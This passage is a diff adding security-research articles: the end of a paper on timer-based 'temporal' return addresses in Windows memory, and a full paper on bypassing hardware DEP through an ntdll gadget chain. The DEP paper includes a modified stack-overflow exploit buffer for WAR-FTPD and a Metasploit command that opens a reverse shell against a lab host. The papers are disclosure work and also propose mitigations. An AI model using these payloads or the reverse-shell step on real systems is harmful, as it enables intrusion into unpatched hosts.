InterruptTime : _KSYSTEM_TIME + +0x014 SystemTime : _KSYSTEM_TIME + +0x020 TimeZoneBias : _KSYSTEM_TIME + +0x02c ImageNumberLow : Uint2B + +0x02e ImageNumberHigh : Uint2B + +0x030 NtSystemRoot : [260] Uint2B + +0x238 MaxStackTraceDepth : Uint4B + +0x23c CryptoExponent : Uint4B + +0x240 TimeZoneId : Uint4B + +0x244 Reserved2 : [8] Uint4B + +0x264 NtProductType : _NT_PRODUCT_TYPE + +0x268 ProductTypeIsValid : UChar + +0x26c NtMajorVersion : Uint4B + +0x270 NtMinorVersion : Uint4B + +0x274 ProcessorFeatures : [64] UChar + +0x2b4 Reserved1 : Uint4B + +0x2b8 Reserved3 : Uint4B + +0x2bc TimeSlip : Uint4B + +0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE + +0x2c8 SystemExpirationDate : _LARGE_INTEGER + +0x2d0 SuiteMask : Uint4B + +0x2d4 KdDebuggerEnabled : UChar + +0x2d5 NXSupportPolicy : UChar + +0x2d8 ActiveConsoleId : Uint4B + +0x2dc DismountCount : Uint4B + +0x2e0 ComPlusPackage : Uint4B + +0x2e4 LastSystemRITEventTickCount : Uint4B + +0x2e8 NumberOfPhysicalPages : Uint4B + +0x2ec SafeBootMode : UChar + +0x2f0 TraceLogging : Uint4B + +0x2f8 TestRetInstruction : Uint8B + +0x300 SystemCall : Uint4B + +0x304 SystemCallReturn : Uint4B + +0x308 SystemCallPad : [3] Uint8B + +0x320 TickCount : _KSYSTEM_TIME + +0x320 TickCountQuad : Uint8B + +0x330 Cookie : Uint4B + + +One of the purposes of SharedUserData is to provide processes with a global +and consistent method of obtaining certain information that may be requested +frequently, thus making it more efficient than having to incur the performance +hit of a system call. Furthermore, as of Windows XP, SharedUserData acts as +an indirect system call re-director such that the most optimized system call +instructions can be used based on the current hardware's support, such as by +using sysenter over the standard int 0x2e. + +As can be seen right off the bat, SharedUserData contains a few fields that +pertain to the timing of the current system. Furthermore, if one looks +closely, it can be seen that these timer fields are actually updated +constantly as would be expected for any timer variable: + + +0:000> dd 0x7ffe0000 L8 +7ffe0000 055d7525 0fa00000 93fd5902 00000cca +7ffe0010 00000cca a78f0b48 01c59a46 01c59a46 +0:000> dd 0x7ffe0000 L8 +7ffe0000 055d7558 0fa00000 9477d5d2 00000cca +7ffe0010 00000cca a808a336 01c59a46 01c59a46 +0:000> dd 0x7ffe0000 L8 +7ffe0000 055d7587 0fa00000 94e80a7e 00000cca +7ffe0010 00000cca a878b1bc 01c59a46 01c59a46 + + +The three timing-related fields of most interest are TickCountLow, +InterruptTime, and SystemTime. These three fields will be explained +individually later in this chapter. Prior to that, though, it is important to +understand some of the properties of SharedUserData and why it is that it's +quite useful when it comes to temporal addresses. + + +7.1) The Properties of SharedUserData + +There are a number of important properties of SharedUserData, some of +which make it useful in terms of temporal addresses and others that make it +somewhat infeasible depending on the exploit or hardware support. As far as +the properties that make it useful go, SharedUserData is located at a static +address, 0x7ffe0000, in every version of Windows NT+. Furthermore, +SharedUserData is mapped into every process. The reasons for this are that +NTDLL, and most likely other 3rd party applications, have been compiled and +built with the assumption that SharedUserData is located at a fixed address. +This is something many people are abusing these days when it comes to passing +code from kernel-mode to user-mode. On top of that, SharedUserData is required +to have a backward compatible data structure which means that the offsets of +all existing attributes will never shift, although new attributes may be, and +have been, appended to the end of the data structure. Lastly, there are a few +products for Windows that implement some form of ASLR. Unfortunately for these +products, SharedUserData cannot be feasibly randomized, or at least the author +is not aware of any approaches that wouldn't have severe performance impacts. + +On the negative side of the house, and perhaps one of the most limiting +factors when it comes to making use of SharedUserData, is that it has a null +byte located at byte index one. Depending on the vulnerability, it may or may +not be possible to use an attribute within SharedUserData as a return address +due to NULL byte restrictions. As of XP SP2 and 2003 Server SP1, +SharedUserData is no longer marked as executable and will result in a DEP +violation (if enabled) assuming the hardware supports PAE. While this is not +very common yet, it is sure to become the norm over the course of time. + + +7.2) Locating Temporal Addresses + +As seen previously in this document, using the telescope program on any +Windows application will result in the same two (or three) timers being +displayed: + + +C:\>telescope 2620 +[*] Attaching to process 2620 (5 polling cycles)... +[*] Polling address space........ + +Temporal address locations: +0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec] +0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec] + + +Referring to the structure definition described at the beginning of this +chapter, it is possible for one to determine which attribute each of these +addresses is referring to. Each of these three attributes will be discussed +in detail in the following sub-sections. + + +7.2.1) TickCountLow + +The TickCountLow attribute is used, in combination with the +TickCountMultiplier, to convey the number of milliseconds that have occurred +since system boot. To calculate the number of milliseconds since system boot, +the following equation is used: + + + T = shr(TickCountLow * TickCountMultiplier, 24) + + +This attribute is representative of a temporal address that has a counter +scale. It starts an unknown time and increments at constant intervals. The +biggest problem with this attribute are the intervals that it increases at. +It's possible that two machines in the same room with different hardware will +have different update periods for the TickCountLow attribute. This makes it +less feasible to use as a temporal address because the update period cannot be +readily predicted. On the other hand, it may be possible to determine the +current uptime of the machine through TCP timestamps or some alternative +mechanism, but without the ability to determine the update period, the +TickCountLow attribute seems unusable. + +This attribute is located at 0x7ffe0000 on all versions of Windows NT+. + + +7.2.2) InterruptTime + +This attribute is used to store a 100 nanosecond timer starting at system boot +that presumably counts the amount of time spent processing interrupts. The +attribute itself is stored as a KSYSTEMTIME structure which is defined as: + + +0:000> dt _KSYSTEM_TIME + +0x000 LowPart : Uint4B + +0x004 High1Time : Int4B + +0x008 High2Time : Int4B + + +Depending on the hardware a machine is running, the InterruptTime's period may +be exactly equal to 100 nanoseconds. However, testing has seemed to confirm +that this is not always the case. Given this, both the update period and the +scale of the InterruptTime attribute should be seen as limiting factors. This +fact makes it less useful because it has the same limitations as the +TickCountLow attribute. Specifically, without knowing when the system booted +and when the counter started, or how much time has been spent processing +interrupts, it is not possible to reliably predict when certain bytes will be +at certain offsets. Furthermore, the machine would need to have been booted +for a significant amount of time in order for some of the useful instructions +to be feasibly found within the bytes that compose the timer. + +This attribute is located at 0x7ffe0008 on all versions of Windows NT+. + + +7.2.3) SystemTime + +The SystemTime attribute is by far the most useful attribute when it comes to +its temporal address qualities. The attribute itself is a 100 nanosecond +timer that is measured from Jan. 1, 1601 which is stored as a KSYSTEMTIME +structure like the InterruptTime attribute. See the InterruptTime sub-section +for a structure definition. This means that it has an update period of 100 +nanoseconds and has a scale that measures from Jan. 1, 1601. The scale is also +measured relative to the timezone that the machine is using (with the +exclusion of daylight savings time). If an attacker is able to obtain +information about the system time on a target machine, it may be possible to +make use of the SystemTime attribute as a valid temporal address for +exploitation purposes. + +This attribute is located at 0x7ffe0014 on all versions of Windows NT+. + + +7.3) Calculating Viable Opcode Windows + +After analyzing SharedUserData for temporal addresses it should become clear +that the SystemTime attribute is by far the most useful and potentially +feasible attribute due to its scale and update period. In order to +successfully leverage it in conjunction with an exploit, though, the viable +opcode windows must be calculated so that a time to strike can be selected. +This can be done prior to determining what the actual date is on a target +machine but requires that the storage capacity (size of the temporal address +in bytes), the update period, and the scale be known. In this case, the size +of the SystemTime attribute is 12 bytes, though in reality the 3rd attribute, +High2Time, is exactly the same as the second, High1Time, so all that really +matters are the the first 8 bytes. Doing the math to calculate per-byte +durations gives the results shown in figure . This indicates that it is only +worth focusing on opcode permutations that start at byte index four due to the +fact that all previous byte indexes have a duration of less than or equal to +one second. By applying the scale as being measured since Jan 1, 1601, all of +the possible permutations for the past, present, and future can be calculated +as described in chapter . The results of these calculations for the +SystemTime attribute are described in the following paragraphs. + +In order to calculate the viable opcode windows it is necessary to have +identified the viable set of opcodes. In this case study a total of 320 +viable opcodes were used (recall that opcode in this case can mean one or more +instruction). These viable opcodes were taken from the Metasploit Opcode +Database. After performing the necessary calculations and generating all of +the permutations, a total of 3615 viable opcode windows were found between +Jan. 1, 1970 and Dec. 23, 2037. Each viable opcode was broken down into +groupings of similar or equivalent opcodes such that it could be made easier +to visualize. + +Looking closely at these figures it can bee seen that there were two large +spikes around 2002 and 2003 for the [esp + 8] => eip opcode group which +includes pop/pop/ret instructions common to SEH overwrites. Looking more +closely at these two years shows that there were two significant periods of +time during 2002 and 2003 where the stars aligned and certain exploits could +have used the SystemTime attribute as a temporal return address. Figure shows +the spikes in more detail. It's a shame that this technique was not published +about during those time frames! Never again in the lifetime of anyone who +reads this paper will there be such an occurrence. + +Perhaps of more interest than past occurrences of certain opcode groups is +what will come in the future. The table in figure 7.1 shows the upcoming +viable opcode windows for 2005. + + + Date Opcode Group + ------------------------------------------ + Sun Sep 25 22:08:50 CDT 2005 eax => eip + Sun Sep 25 22:15:59 CDT 2005 ecx => eip + Sun Sep 25 22:23:09 CDT 2005 edx => eip + Sun Sep 25 22:30:18 CDT 2005 ebx => eip + Sun Sep 25 22:37:28 CDT 2005 esp => eip + Sun Sep 25 22:44:37 CDT 2005 ebp => eip + Sun Sep 25 22:51:47 CDT 2005 esi => eip + Sun Sep 25 22:58:56 CDT 2005 edi => eip + Tue Sep 27 04:41:21 CDT 2005 eax => eip + Tue Sep 27 04:48:30 CDT 2005 ecx => eip + Tue Sep 27 04:55:40 CDT 2005 edx => eip + Tue Sep 27 05:02:49 CDT 2005 ebx => eip + Tue Sep 27 05:09:59 CDT 2005 esp => eip + Tue Sep 27 05:17:08 CDT 2005 ebp => eip + Tue Sep 27 05:24:18 CDT 2005 esi => eip + Tue Sep 27 05:31:27 CDT 2005 edi => eip + Tue Sep 27 06:43:02 CDT 2005 [esp + 0x20] => eip + Fri Oct 14 14:36:48 CDT 2005 eax => eip + Sat Oct 15 21:09:19 CDT 2005 ecx => eip + Mon Oct 17 03:41:50 CDT 2005 edx => eip + Tue Oct 18 10:14:22 CDT 2005 ebx => eip + Wed Oct 19 16:46:53 CDT 2005 esp => eip + Thu Oct 20 23:19:24 CDT 2005 ebp => eip + Sat Oct 22 05:51:55 CDT 2005 esi => eip + Sun Oct 23 12:24:26 CDT 2005 edi => eip + Thu Nov 03 23:17:07 CST 2005 eax => eip + Sat Nov 05 05:49:38 CST 2005 ecx => eip + Sun Nov 06 12:22:09 CST 2005 edx => eip + Mon Nov 07 18:54:40 CST 2005 ebx => eip + Wed Nov 09 01:27:11 CST 2005 esp => eip + Thu Nov 10 07:59:42 CST 2005 ebp => eip + Fri Nov 11 14:32:14 CST 2005 esi => eip + Sat Nov 12 21:04:45 CST 2005 edi => eip + + Figure 7.1: Opcode windows for Sept 2005 - Jan 2006 + + +8) Case study: Example application + +Aside from Windows' processes having SharedUserData present, it may also be +possible, depending on the application in question, to find other temporal +addresses at static locations across various operating system versions. Take +for instance the following example program that simply calls time every second +and stores it in a local variable on the stack named t: + + +#include +#include + +void main() { + unsigned long t; + + while (1) { + t = time(NULL); + SleepEx(1000, TRUE); + } +} + + +When the telescope program is run against a running instance of this example +program, the results produced are: + + +C:\>telescope 3004 +[*] Attaching to process 3004 (5 polling cycles)... +[*] Polling address space........ + +Temporal address locations: +0x0012FE24 [Size=4, Scale=Counter, Period=70 msec] +0x0012FE88 [Size=4, Scale=Counter, Period=1 sec] +0x0012FE9C [Size=4, Scale=Counter, Period=1 sec] +0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec] +0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec] +0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec] + + +Judging from the source code of the example application it would seem clear +that the address 0x0012ff7c coincides with the local variable t which is used +to store the number of seconds since 1970. Indeed, the t variable also has an +update period of one second as indicated by the telescope program. The other +finds may be either inaccurate or not useful depending on the particular +situation, but due to the fact that they were identified as counters instead +of being relative to one of the two epoch times most likely makes them +unusable. + +In order to write an exploit that can leverage the temporal address t, it is +first necessary to take the steps outlined in this document with regard to +calculating the duration of each byte index and then building a list of all +the viable opcode permutations. The duration of each byte index for a four +byte timer with a one second period are shown in figure 8.1. + + + Byte Index Seconds (ext) + ------------------------ + 0 1 (1 sec) + 1 256 (4 mins 16 secs) + 2 65536 (18 hours 12 mins 16 secs) + 3 16777216 (194 days 4 hours 20 mins 16 secs) + + Figure 8.1: 4 byte 1sec per-byte durations in seconds + + +The starting byte index for this temporal address is byte index one due to the +fact that it has the smallest feasible window of time for an exploit to be +launched (4 mins 16 secs). After identifying this starting byte index, +permutations for all the viable opcodes can be generated. + +Nearly all of the viable opcode windows have a window of 4 minutes. Only a +few have a window of 18 hours. To get a better idea for what the future has +in store for a timer like this one, table 8.2 shows the upcoming viable opcode +windows for 2005. + + + Date Opcode Group + ------------------------------------------ + Fri Sep 02 01:28:00 CDT 2005 [reg] => eip + Thu Sep 08 21:18:24 CDT 2005 [reg] => eip + Fri Sep 09 15:30:40 CDT 2005 [reg] => eip + Sat Sep 10 09:42:56 CDT 2005 [reg] => eip + Sun Sep 11 03:55:12 CDT 2005 [reg] => eip + Tue Sep 13 10:32:00 CDT 2005 [reg] => eip + Wed Sep 14 04:44:16 CDT 2005 [reg] => eip + + Figure 8.2: Opcode windows for Sept 2005 - Jan 2006 + + +9) Conclusion + +Temporal addresses are locations in memory that are tied to a timer of some +sort, such as a variable storing the number of seconds since 1970. Like a +clock, temporal addresses have an update period, meaning the rate at which its +contents are changed. They also have an inherent storage capacity which +limits the amount of time they can convey before being rolled back over to the +start. Finally, temporal addresses will also always have a scale associated +with them that indicates the unit of measure for the contents of a temporal +address, such as whether it's simply being used as a counter or whether it's +measuring the number of seconds since 1970. These three attributes together +can be used to predict when certain byte combinations will occur within a +temporal address. + +This type of prediction is useful because it can allow an exploitation +chronomancer the ability to wait until the time is right and then strike once +predicted byte combinations occur in memory on a target machine. In +particular, the byte combinations most useful would be ones that represent +useful opcodes, or instructions, that could be used to gain control over +execution flow and allow an attacker to exploit a vulnerability. Such an +ability can give the added benefit of providing an attacker with universal +return addresses in situations where a temporal address is found at a static +location in memory across multiple operating system and application revisions. + +An exploitation chronomancer is one who is capable of divining the best time +to exploit something based on the alignment of certain bytes that occur +naturally in a process' address space. By making use of the techniques +described in this document, or perhaps ones that have yet to be described or +disclosed, those who have yet to dabble in the field of chronomancy can begin +to get their feet wet. Viable opcode windows will come and go, but the +usefulness of temporal addresses will remain for eternityor at least as long +as computers as they are known today are around. + +The fact of the matter is, though, that while the subject matter discussed in +this document may have an inherent value, the likelihood of it being used for +actual exploitation is slim to none due to the variance and delay between +viable opcode windows for different periods and scales of temporal addresses. +Or is it really that unlikely? Vlad902 suggested a scenario where an attacker +could compromise an NTP server and configure it to constantly return a time +that contains a useful opcode for exploitation purposes. All of the machines +that synchronize with the compromised NTP server would then eventually have a +predictable system time. While not completely fool proof considering it's not +always known how often NTP clients will synchronize (although logs could be +used), it's nonetheless an interesting approach. Regardless of feasibility, +the slave that is knowledge demands to be free, and so it shall. + + +Bibliography + +Mesander, Rollo, and Zeuge. The Client-To-Client Protocol (CTCP). +http://www.irchelp.org/irchelp/rfc/ctcpspec.html; accessed Aug +5, 2005. + + +Metasploit Project. The Metasploit Opcode Database. +http://metasploit.com/users/opcode/msfopcode.cgi; accessed Aug +6, 2005. + + +Postel, J. RFC 792 - Internet Control Message Protocol. +http://www.ietf.org/rfc/rfc0792.txt?number=792; accessed Aug +5, 2005. diff --git a/uninformed/2.3.txt b/uninformed/2.3.txt new file mode 100644 index 0000000..f22f28f --- /dev/null +++ b/uninformed/2.3.txt @@ -0,0 +1,400 @@ +Bypassing Windows Hardware-enforced Data Execution Prevention +Oct 2, 2005 + +skape (mmiller@hick.org) +Skywing (Skywing@valhallalegends.com) + +One of the big changes that Microsoft introduced in Windows XP Service Pack 2 +and Windows 2003 Server Service Pack 1 was support for a new feature called Data +Execution Prevention (DEP). This feature was added with the intention of doing +exactly what its name implies: preventing the execution of code in +non-executable memory regions. This is particulary important when it comes to +preventing the exploitation of most software vulnerabilities because most +exploits tend to rely on storing arbitrary code in what end up being +non-executable memory regions, such as a thread stack or a process heap. There +are other documented techniques for bypassing non-executable protections, such +as returning into ZwProtectVirtualMemory or doing a chained ret2libc style +attack, but these approaches tend to be more complicated and in many cases are +more restricted due to the need to use bytes (such as NULL bytes) that would +otherwise be unusable in common situations[1]. + +DEP itself is capable of functioning in two modes. The first mode is referred +to as Software-enforced DEP. It provides fairly limited support for preventing +the execution of code through exploits that take advantage of Structured +Exception Handler (SEH) overwrites. Software-enforced DEP is used on +machines that are not capable of supporting true non-executable pages due to +inadequate hardware support. Software-enforced DEP is also a compile-time only +change, and as such is typically limited to system libraries and select +third-party applications that have been recompiled to take advantage of it. +Bypassing this mode of DEP has been discussed before and is not the focus of +this document. + +The second mode in which DEP can operate is referred to as Hardware-enforced +DEP. This mode is a superset of software-enforced DEP and is used on hardware +that supports marking pages as non-executable. While most existing intel-based +hardware does not have this feature (due to legacy support for only marking +pages as readable or writable), newer chipsets are beginning to have true +hardware support through things like Page Address Extensions (PAE). +Hardware-enforced DEP is the most interesting of the two modes since it can be +seen as a truly mitigating factor to most common exploitation vectors. The +bypass technique described in this document is designed to be used against +this mode. + +Before describing the technique, it is prudent to understand the parameters +under which it will operate. In this case, the technique is meant to provide a +way of executing code from regions of memory that would not typically be +executable when hardware-enforced DEP is in use, such as a thread stack or a +process heap. This technique can be seen as a means of eliminating DEP from the +equation when it comes to writing exploits because the commonly used approach of +executing custom code from a writable memory address can still be used. +Furthermore, this technique is meant to be as generic as possible such that it +can be used in both existing and new exploits without major modifications. With +the parameters set, the next requirement is to understand some of the new +features that compose hardware-enforced DEP. + +When implementing support for DEP, Microsoft rightly realized that many existing +third-party applications might run into major compatibility issues due to +assumptions about whether or not a region of allocated memory is executable. In +order to handle this situation, Microsoft designed DEP so that it could be +configured in a few different manners. At the most general level, DEP is +designed to have a default parameter that indicates whether or not +non-executable protection is enabled only for system processes and custom +defined applications (OptIn), or whether it's enabled for everything except for +applications that are specifically exempted (OptOut). These two flags are +passed to the kernel during boot through the /NoExecute option in boot.ini. +Furthermore, two other flags can be passed as part of the NoExecute option to +indicate that DEP should be AlwaysOn or AlwaysOff. These two settings force a +flag to be set for each process that permanently enables or disables DEP. The +default setting on Windows XP SP2 is OptIn, while the default setting on Windows +2003 Server SP1 is OptOut. + +Aside from the global system parameter, DEP can also be enabled or disabled on a +per-process basis. The disabling of non-executable (NX) support for a process +is determined at execution time. To support this, a new internal routine was +added to ntdll.dll called LdrpCheckNXCompatibility. This routine checks a few +different things to determine whether or not NX support should be enabled for +the process. The routine itself is called whenever a DLL is loaded in the +context of a process through LdrpRunInitializationRoutines. The first check it +performs is to see if a SafeDisc DLL is being loaded. If it is, NX support is +flagged as needing to be disabled for the process. The second check it performs +is to look in the application database for the process to see if NX support +should be disabled or enabled. Lastly, it checks to see if the DLL that is +being loaded is flagged as having an NX incompatible section (such as .aspack, +.pcle, and .sforce). + +As a result of these checks, NX support is either enabled or disabled through a +new PROCESSINFOCLASS named ProcessExecuteFlags (0x22). When a call to +NtSetInformationProcess is issued with this information class, a four byte +bitmask is supplied as the buffer parameter. This bitmask is passed to +nt!MmSetExecuteOptions which performs the appropriate operation. Optionally, a +flag (MEM_EXECUTE_OPTION_PERMANENT, or 0x8) can also be specified as part of the +bitmask that indicates that future calls to the function should fail such that +the execute flags cannot be changed again. To enable NX support, the +MEM_EXECUTE_OPTION_DISABLE flag (0x1) is specified. To disable NX support, the +MEM_EXECUTE_OPTION_ENABLE flag (0x2) is specified. Depending on the state of +these per-process flags, execution of code from non-executable memory regions +will either be permitted (MEM_EXECUTE_OPTION_ENABLE) or denied +(MEM_EXECUTE_OPTION_DISABLE). + +If it were in some way possible for an attacker to change the execution flags of +a process that is being exploited, then it follows that the attacker would be +able to execute code from previously non-executable memory regions. In order to +do this, though, the attacker would have to run code from regions of memory that +are already executable. As chance would have it, there happen to be useful +executable memory regions, and they exist at the same address in every process +[2]. + +To take advantage of this feature, an attacker must somehow cause +NtSetInformationProcess to be called with the ProcessExecuteFlags information +class. Furthermore, the ProcessInformation parameter must be set to a bitmask +that has the MEM_EXECUTE_OPTION_ENABLE bit set, but not the +MEM_EXECUTE_OPTION_DISABLE bit set. The following code illustrates a call to +this function that would disable NX support for the calling process: + + +ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE; + +NtSetInformationProcess( + NtCurrentProcess(), // (HANDLE)-1 + ProcessExecuteFlags, // 0x22 + &ExecuteFlags, // ptr to 0x2 + sizeof(ExecuteFlags)); // 0x4 + + +One method of accomplishing this would be to use a ret2libc derived attack +whereby control flow is transferred into the NtSetInformationProcess function +with an attacker-controlled frame set up on the stack. In this case, the +arguments described to the right in the above code snippet would have to be set +up on the stack so that they would be interpreted correctly when +NtSetInformationProcess begins executing. The biggest drawback to this approach +is that it would require NULL bytes to be usable as part of the buffer that is +used for the overflow. Generally speaking, this will not be possible, +especially with any overflow that is caused through the use of a string +function. However, when possible, this approach can certainly be useful. + +Though a direct return into NtSetInformationProcess may not be universally +feasible, another technique can be used that lends itself to being more +generally applicable. Under this approach, the attacker can take advantage of +code that already exists within ntdll for disabling NX support for a process. +By returning into a specific chunk of code, it is possible to disable NX support +just as ntdll would while still being able to transfer control back into a +user-controlled buffer. The one limitation, however, is that the attacker be +able to control the stack in a way similar to most ret2libc style attacks, but +without the need to control arguments. + +The first step in this process is to cause control to be transferred to a +location in memory that performs an operation that is equivalent to a mov al, +0x1 / ret combination. Many instances of similar instructions exist (xor eax, +eax/inc eax/ret; mov eax, 1/ret; etc). One such instance can be found in the +ntdll!NtdllOkayToLockRoutine function. + + +ntdll!NtdllOkayToLockRoutine: +7c952080 b001 mov al,0x1 +7c952082 c20400 ret 0x4 + + +This will cause the low byte of eax to be set to one for reasons that will +become apparent in the next step. Once control is transferred to the mov +instruction, and then subsequently the ret instruction, the attacker must have +set up the stack in such a way that the ret instruction actually returns into +another segment of code inside ntdll. Specifically, it should return part of +the way into the ntdll!LdrpCheckNXCompatibility routine. + + +ntdll!LdrpCheckNXCompatibility+0x13: +7c91d3f8 3c01 cmp al,0x1 +7c91d3fa 6a02 push 0x2 +7c91d3fc 5e pop esi +7c91d3fd 0f84b72a0200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93feba) + + +In this block, a check is made to see if the low byte of eax is set to one. +Regardless of whether or not it is, esi is initialized to hold the value 2. +After that, a check is made to see if the zero flag is set (as would be the case +if the low byte of eax is 1). Since this code will be executed after the first +mov al, 0x1 / ret set of instructions, the ZF flag will always be set, thus +transferring control to 0x7c93feba. + + +ntdll!LdrpCheckNXCompatibility+0x1a: +7c93feba 8975fc mov [ebp-0x4],esi +7c93febd e941d5fdff jmp ntdll!LdrpCheckNXCompatibility+0x1d (7c91d403) + + +This block sets a local variable to the contents of esi, which in this case is +2. Afterwards, it transfers to control to 0x7c91d403. + + +ntdll!LdrpCheckNXCompatibility+0x1d: +7c91d403 837dfc00 cmp dword ptr [ebp-0x4],0x0 +7c91d407 0f8560890100 jne ntdll!LdrpCheckNXCompatibility+0x4d (7c935d6d) + + +This block, in turn, compares the local variable that was just initialized to 2 +with 0. If it's not zero (which it won't be), control is transferred to +0x7c935d6d. + + +ntdll!LdrpCheckNXCompatibility+0x4d: +7c935d6d 6a04 push 0x4 +7c935d6f 8d45fc lea eax,[ebp-0x4] +7c935d72 50 push eax +7c935d73 6a22 push 0x22 +7c935d75 6aff push 0xff +7c935d77 e8b188fdff call ntdll!ZwSetInformationProcess (7c90e62d) +7c935d7c e9c076feff jmp ntdll!LdrpCheckNXCompatibility+0x5c (7c91d441) + + +It's at this point that things begin to get interesting. In this block, a call +is issued to NtSetInformationProcess with the ProcessExecuteFlags information +class. The ProcessInformation parameter pointer is passed which was previously +initialized to 2 [3]. This results in NX support being disabled for the process. +After the call completes, it transfers control to 0x7c91d441. + + +ntdll!LdrpCheckNXCompatibility+0x5c: +7c91d441 5e pop esi +7c91d442 c9 leave +7c91d443 c20400 ret 0x4 + + +Finally, this block simply restores saved registers, issues a leave instruction, +and returns to the caller. In this case, the attacker will have set up the +frame in such a way that the ret instruction actually returns into a general +purpose instruction that transfers control into a controllable buffer that +contains the arbitrary code to be executed now that NX support has been +disabled. + +This approach requires the knowledge of three addresses. First, the address of +the mov al, 0x1 / ret equivalent must be known. Fortunately, there are many +occurrences of this type of block, though they may not be as simplistic as the +one described in this document. Second, the address of the start of the cmp al, +0x1 block inside ntdll!LdrpCheckNXCompatibility must be known. By depending on +two addresses within ntdll, it stands to reason that an exploit can be more +portable than if one were to depend on addresses from two different DLLs. +Finally, the third address is the one that would be the one that is typically +used on targets that didn't have hardware-enforced DEP, such as a jmp esp or +equivalent instruction depending on the vulnerability in question. + +Aside from specific address limitations, this approach also relies on the fact +that ebp is pointed to a valid, writable address such that the value that +indicates that NX support should be disabled can be temporarily stored. This +can be accomplished a few different ways, depending on the vulnerability, so it +is not seen as a largely limiting factor. + +To test this approach, the authors modified the warftpd_165_user exploit from +the Metasploit Framework that was written by Fairuzan Roslan. This +vulnerability is a simple stack overflow. Prior to our modifications, the +exploit was implemented in the following manner: + + +my $evil = $self->MakeNops(1024); +substr($evil, 485, 4, pack("V", $target->[1])); +substr($evil, 600, length($shellcode), $shellcode); + + +This code built a NOP sled of 1024 bytes. At byte index 485, the return address +was stored after which point the shellcode was appended [4]. When run against a target +that supports hardware-enforced DEP, the exploit fails when it tries to execute +the first instruction of the NOP sled because the region of memory (the thread +stack) is marked as non-executable. + +Applying the technique described above, the authors changed the exploit to send +a buffer structured as follows: + + +my $evil = "\xcc" x 485; +$evil .= "\x80\x20\x95\x7c"; +$evil .= "\xff\xff\xff\xff"; +$evil .= "\xf8\xd3\x91\x7c"; +$evil .= "\xff\xff\xff\xff"; +$evil .= "\xcc" x 0x54; +$evil .= pack("V", $target->[1]); +$evil .= $shellcode; +$evil .= "\xcc" x (1024 - length($evil)); + + +In this case, a buffer was built that contained 485 int3 instructions. From +there, the buffer was set to overwrite the return address with a pointer to +ntdll!NtdllOkayToLockRoutine. Since this routine does a retn 0x4, the next four +bytes are padding as a fake argument that is popped off the stack. Once +NtdllOkayToLockRoutine returns, the stack would point 493 bytes into the evil +buffer that is being built (immediately after the 0x7c952080 return address +overwrite and the fake argument). This means that NtdllOkayToLockRoutine would +return into 0x7c91d3f8. This block of code is what evaluates the low byte of +eax and eventually leads to the disabling of NX support for the process. Once +completed, the block pops saved registers off the stack and issues a leave +instruction, moving the stack pointer to where ebp currently points. In this +case, ebp was 0x54 bytes away from esp, so we inserted 0x54 bytes of padding. +Once the block does this, the stack pointer will point 577 bytes into the evil +buffer (immediately after the 0x54 bytes of padding). This means that it will +return into whatever address is stored at this location. In this case, the +buffer is populated such that it simply returns into the target-specified return +address (which is a jmp esp equivalent instruction). From there, the jmp esp +instruction is executed which transfers control into the shellcode that +immediately follows it. Once executed, the exploit works as if nothing had +changed: + +$ ./msfcli warftpd_165_user_dep RHOST=192.168.244.128 RPORT=4446 \ + LHOST=192.168.244.2 LPORT=4444 PAYLOAD=win32_reverse TARGET=2 E +[*] Starting Reverse Handler. +[*] Trying Windows XP SP2 English using return address 0x71ab9372.... +[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready +[*] Sending evil buffer.... +[*] Got connection from 192.168.244.2:4444 <-> 192.168.244.128:46638 + +Microsoft Windows XP [Version 5.1.2600] +(C) Copyright 1985-2001 Microsoft Corp. + +C:\Program Files\War-ftpd> + + +As can be seen, the technique described in this document outlines a feasible +method that can be used to circumvent the security enhancements provided by +hardware-enforced DEP in the default installations of Windows XP Service Pack 2 +and Windows 2003 Server Service Pack 1. The flaw itself is not related to any +specific inefficiency or mistake made during the actual implementation of +hardware-enforced DEP support, but instead is a side effect of a design decision +by Microsoft to provide a mechanism for disabling NX support for a process from +within a user-mode process. Had it been the case that there was no mechanism by +which NX support could be disabled at runtime from within a process, the +approaches outlined in this document would not be feasible. + +In the interest of not presenting a problem without also describing a solution, +the authors have identified a few different ways in which Microsoft might be +able to solve this. To prevent this approach, it is first necessary to identify +the things that it depends on. First and foremost, the technique depends on +knowing the location of three separate addresses. Second, it depends on the +feature being exposed that allows a user-mode process to disable NX support for +itself. Finally, it depends on the ability to control the stack in a manner +that allows it perform a ret2libc style attack [5]. + +The first dependency could be broken by instituting some form of Address Space +Layout Randomization that would thereby make the location of the dependent code +blocks unknown to an attacker. The second dependency could be broken by moving +the logic that controls the enabling and disabling of a process' NX support to +kernel-mode such that it cannot be influenced in such a direct manner. This +approach is slightly challenging considering the model that it is currently +implemented under requires the ability to disable NX support when certain events +(such as the loading of an incompatible DLL) occur. Although it may be more +challenging, the authors see this as being the most feasible approach in terms +of compatibility. Lastly, the final dependency is not really something that +Microsoft can control. Aside from these potential solutions, it might also be +possible to come up with a way to make it so the permanent flag is set sooner in +the process' initialization, though the authors are not sure of a way in which +this could be made possible without breaking support for disabling when certain +DLLs are loaded. + +In closing, the authors would like to make a special point to indicate that +Microsoft has done an excellent job in raising the bar with their security +improvements in XP Serivce Pack 2. The technique outlined in this document +should not be seen as a case of Microsoft failing to implement something +securely, as the provisions are certainly there to deploy hardware-enforced DEP +in a secure fashion, but instead might be better viewed as a concession that was +made to ensure that application compatibility was retained for the general case. +There is almost always a trade-off when it comes to providing new security +features in the face of potential compatibility problems, and it can be said +that perhaps no company other than Microsoft is more well known for retaining +backward compatibility. + + +Footnotes + +[1] There are other documented techniques for bypassing non-executable + protections, such as returning into ZwProtectVirtualMemory or doing a chained + ret2libc style attack, but these approaches tend to be more complicated and in + many cases are more restricted due to the need to use bytes (such as NULL + bytes) that would otherwise be unusable in common situations. + +[2] With a few parameters that will be discussed later. + +[3] The reason this has to point to 2 and not some integer that has just the low + byte set to 2 is because nt!MmSetExecutionOptions has a check to ensure that the + unused bits are not set. + +[4] In reality, it may not be the return address that is being overwritten, but + instead might be a function pointer. The fact that it is at a misaligned + address lends credence to this fact, though it is certainly 